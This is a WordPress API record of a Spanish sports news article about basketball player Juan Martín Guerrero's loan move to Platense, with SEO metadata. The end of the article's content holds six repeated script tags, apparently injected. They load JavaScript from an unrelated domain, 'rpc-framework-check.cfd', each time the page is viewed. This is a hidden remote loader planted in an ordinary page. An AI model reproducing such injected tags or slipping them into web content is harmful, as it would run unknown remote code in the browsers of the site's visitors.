{"id":23563,"date":"2025-08-20T13:35:08","date_gmt":"2025-08-20T16:35:08","guid":{"rendered":"https:\/\/www.sanjuandeportes.com\/wp\/?p=23563"},"modified":"2026-02-02T18:57:13","modified_gmt":"2026-02-02T21:57:13","slug":"juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional","status":"publish","type":"post","link":"https:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/","title":{"rendered":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Con apenas 22 a\u00f1os, Juan Mart\u00edn Guerrero sumar\u00e1 un nuevo cap\u00edtulo en su carrera: el base sanjuanino vestir\u00e1 la camiseta de Platense en la pr\u00f3xima Liga Nacional de B\u00e1squetbol.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Formado en Inca Huasi y con paso por la selecci\u00f3n de San Juan, Guerrero dej\u00f3 la provincia en 2020 para sumarse a Boca Juniors, club en el que fue bicampe\u00f3n de la Liga Nacional de Basquetbol. All\u00ed integr\u00f3 los planteles campeones de las temporadas 2023\/24 y 2024\/25, consolid\u00e1ndose como una de las j\u00f3venes promesas del b\u00e1squet argentino. Ahora, a pr\u00e9stamo del Xeneize, tendr\u00e1 su primera experiencia lejos del club que lo vio crecer en la elite.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El jugador, nacido el 12 de marzo de 2003 y de 1,88 metros de altura, permanecer\u00e1 en Capital Federal, donde adem\u00e1s de continuar su carrera deportiva busca cerrar su etapa de estudios.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u201cEstoy ansioso por arrancar la pretemporada. Platense es un club familiar, con buenas instalaciones y preparado para competir\u201d, expres\u00f3 con entusiasmo en sus primeros d\u00edas como jugador del Calamar.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">En la pasada temporada Platense termin\u00f3 en el septimo lugar en la fase regular con 38 partidos disputados con 53 puntos y para este presente a\u00f1o el hist\u00f3rico entrenador Alejandro Cholo V\u00e1zquez pasa a ser manager del equipo y la conducci\u00f3n t\u00e9cnica estar\u00e1 a cargo de Mart\u00edn Yang\u00fcela<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sobre sus objetivos, Guerrero apunt\u00f3 a la regularidad y al aporte colectivo: \u201cQuiero dar lo m\u00e1ximo al club y crecer desde lo individual. El equipo tiene muchos j\u00f3venes con ganas de destacarse, eso nos va a permitir entrenar fuerte y formar un grupo s\u00f3lido\u201d.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">El b\u00e1squet sanjuanino celebra un nuevo paso en la carrera de Guerrero, quien afrontar\u00e1 un desaf\u00edo que promete ser clave en su desarrollo profesional.<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>Con apenas 22 a\u00f1os, Juan Mart\u00edn Guerrero sumar\u00e1 un nuevo cap\u00edtulo en su carrera: el base sanjuanino vestir\u00e1 la camiseta de Platense en la pr\u00f3xima Liga Nacional de B\u00e1squetbol. Formado en Inca Huasi y con paso por la selecci\u00f3n de San Juan, Guerrero dej\u00f3 la provincia en 2020 para sumarse a Boca Juniors, club en [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":23564,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[45,178],"tags":[],"class_list":["post-23563","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basquet","category-san-juan"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes\" \/>\n<meta property=\"og:description\" content=\"Con apenas 22 a\u00f1os, Juan Mart\u00edn Guerrero sumar\u00e1 un nuevo cap\u00edtulo en su carrera: el base sanjuanino vestir\u00e1 la camiseta de Platense en la pr\u00f3xima Liga Nacional de B\u00e1squetbol. Formado en Inca Huasi y con paso por la selecci\u00f3n de San Juan, Guerrero dej\u00f3 la provincia en 2020 para sumarse a Boca Juniors, club en [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/\" \/>\n<meta property=\"og:site_name\" content=\"San Juan Deportes\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/sanjuandeportesok\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-20T16:35:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-02T21:57:13+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1073\" \/>\n\t<meta property=\"og:image:height\" content=\"763\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:site\" content=\"@SanJuanDeportes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#article\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/\"},\"author\":{\"name\":\"admin\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\"},\"headline\":\"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional\",\"datePublished\":\"2025-08-20T16:35:08+00:00\",\"dateModified\":\"2026-02-02T21:57:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/\"},\"wordCount\":310,\"commentCount\":0,\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/GUERRERO.jpg\",\"articleSection\":[\"Basquet\",\"San Juan\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/\",\"name\":\"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes\",\"isPartOf\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#primaryimage\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/GUERRERO.jpg\",\"datePublished\":\"2025-08-20T16:35:08+00:00\",\"dateModified\":\"2026-02-02T21:57:13+00:00\",\"breadcrumb\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/GUERRERO.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/2025\\\/08\\\/GUERRERO.jpg\",\"width\":1073,\"height\":763},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/2025\\\/08\\\/20\\\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#website\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"name\":\"San Juan Deportes\",\"description\":\"El sitio de deportes de la provincia de San Juan\",\"publisher\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#organization\",\"name\":\"San Juan Deportes\",\"url\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"contentUrl\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/wp-content\\\/uploads\\\/unnamed.jpg\",\"width\":900,\"height\":900,\"caption\":\"San Juan Deportes\"},\"image\":{\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/sanjuandeportesok\",\"https:\\\/\\\/x.com\\\/SanJuanDeportes\",\"https:\\\/\\\/www.instagram.com\\\/sanjuandeportes\"]},{\"@type\":\"Person\",\"@id\":\"http:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/#\\\/schema\\\/person\\\/d8e3463931719391897f9c7a6d1bb7b3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\\\/\\\/www.sanjuandeportes.com\\\/wp\\\/author\\\/admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/","og_locale":"es_ES","og_type":"article","og_title":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes","og_description":"Con apenas 22 a\u00f1os, Juan Mart\u00edn Guerrero sumar\u00e1 un nuevo cap\u00edtulo en su carrera: el base sanjuanino vestir\u00e1 la camiseta de Platense en la pr\u00f3xima Liga Nacional de B\u00e1squetbol. Formado en Inca Huasi y con paso por la selecci\u00f3n de San Juan, Guerrero dej\u00f3 la provincia en 2020 para sumarse a Boca Juniors, club en [&hellip;]","og_url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/","og_site_name":"San Juan Deportes","article_publisher":"https:\/\/www.facebook.com\/sanjuandeportesok","article_published_time":"2025-08-20T16:35:08+00:00","article_modified_time":"2026-02-02T21:57:13+00:00","og_image":[{"width":1073,"height":763,"url":"http:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_creator":"@SanJuanDeportes","twitter_site":"@SanJuanDeportes","twitter_misc":{"Escrito por":"admin","Tiempo de lectura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#article","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/"},"author":{"name":"admin","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3"},"headline":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional","datePublished":"2025-08-20T16:35:08+00:00","dateModified":"2026-02-02T21:57:13+00:00","mainEntityOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/"},"wordCount":310,"commentCount":0,"publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg","articleSection":["Basquet","San Juan"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#respond"]}]},{"@type":"WebPage","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/","url":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/","name":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional - San Juan Deportes","isPartOf":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#primaryimage"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#primaryimage"},"thumbnailUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg","datePublished":"2025-08-20T16:35:08+00:00","dateModified":"2026-02-02T21:57:13+00:00","breadcrumb":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#primaryimage","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/2025\/08\/GUERRERO.jpg","width":1073,"height":763},{"@type":"BreadcrumbList","@id":"http:\/\/www.sanjuandeportes.com\/wp\/2025\/08\/20\/juan-martin-guerrero-nuevo-refuerzo-de-platense-en-la-liga-nacional\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.sanjuandeportes.com\/wp\/"},{"@type":"ListItem","position":2,"name":"Juan Mart\u00edn Guerrero, nuevo refuerzo de Platense en la Liga Nacional"}]},{"@type":"WebSite","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#website","url":"http:\/\/www.sanjuandeportes.com\/wp\/","name":"San Juan Deportes","description":"El sitio de deportes de la provincia de San Juan","publisher":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.sanjuandeportes.com\/wp\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Organization","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#organization","name":"San Juan Deportes","url":"http:\/\/www.sanjuandeportes.com\/wp\/","logo":{"@type":"ImageObject","inLanguage":"es","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/","url":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","contentUrl":"https:\/\/www.sanjuandeportes.com\/wp\/wp-content\/uploads\/unnamed.jpg","width":900,"height":900,"caption":"San Juan Deportes"},"image":{"@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/sanjuandeportesok","https:\/\/x.com\/SanJuanDeportes","https:\/\/www.instagram.com\/sanjuandeportes"]},{"@type":"Person","@id":"http:\/\/www.sanjuandeportes.com\/wp\/#\/schema\/person\/d8e3463931719391897f9c7a6d1bb7b3","name":"admin","image":{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/c4deacdacf798758c71e8e4f4ca4bcf755ae082e386babce41b35a278703bed5?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/www.sanjuandeportes.com\/wp\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/comments?post=23563"}],"version-history":[{"count":7,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23563\/revisions"}],"predecessor-version":[{"id":28674,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/posts\/23563\/revisions\/28674"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media\/23564"}],"wp:attachment":[{"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/media?parent=23563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/categories?post=23563"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sanjuandeportes.com\/wp\/wp-json\/wp\/v2\/tags?post=23563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}